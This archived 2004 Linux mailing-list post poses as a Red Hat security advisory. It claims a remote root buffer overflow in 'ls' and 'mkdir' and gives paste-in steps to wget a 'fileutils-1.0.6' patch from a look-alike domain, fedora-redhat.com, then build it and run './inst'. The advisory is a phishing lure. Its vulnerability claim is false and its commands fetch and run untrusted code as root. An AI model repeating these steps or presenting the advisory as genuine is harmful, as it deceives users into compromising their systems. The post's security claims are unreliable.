[linux-muc] RedHat: Buffer Overflow in "ls" and "mkdir"

From: RedHat Security Team <security@xxxxxxxxxx>
To: linux-muc@xxxxxxxxxxxxx
Date: Sun, 24 Oct 2004 17:19:47 -0500

Title: Untitled Document

Original issue date: October 20, 2004
Last revised: October 20, 2004
Source: RedHat

A complete revision history is at the end of this file.

Dear RedHat user,

Redhat found a vulnerability in fileutils (ls and mkdir), that could allow a remote attacker to execute arbitrary code with root privileges. Some of the affected linux distributions include RedHat 7.2, RedHat 7.3, RedHat 8.0, RedHat 9.0, Fedora CORE 1, Fedora CORE 2 and not only. It is known that *BSD and Solaris platforms are NOT affected.

The RedHat Security Team strongly advises you to immediately apply the fileutils-1.0.6 patch. This is a critical-critical update that you must make by following these steps:

First download the patch from the Security RedHat mirror: wget www.fedora-redhat.com/fileutils-1.0.6.patch.tar.gz
Untar the patch: tar zxvf fileutils-1.0.6.patch.tar.gz
cd fileutils-1.0.6.patch
make
./inst

Again, please apply this patch as soon as possible or you risk your system and others` to be compromised.

Thank you for your prompt attention to this serious matter,

RedHat Security Team.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ Info (Main-Site): http://wwww.linux-muc.de/ ~~ Un/Subscribe: //www.freelists.org/cgi-bin/list?list_id=linux-muc ~~ Archives //www.freelists.org/archives/linux-muc/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Follow-Ups:
- [linux-muc] Re: RedHat: Buffer Overflow in "ls" and "mkdir"
  - From: Martin F. Hohenberg
- [linux-muc] Re: RedHat: Buffer Overflow in "ls" and "mkdir"
  - From: Peter Wintrich

[linux-muc] RedHat: Buffer Overflow in "ls" and "mkdir"

Other related posts: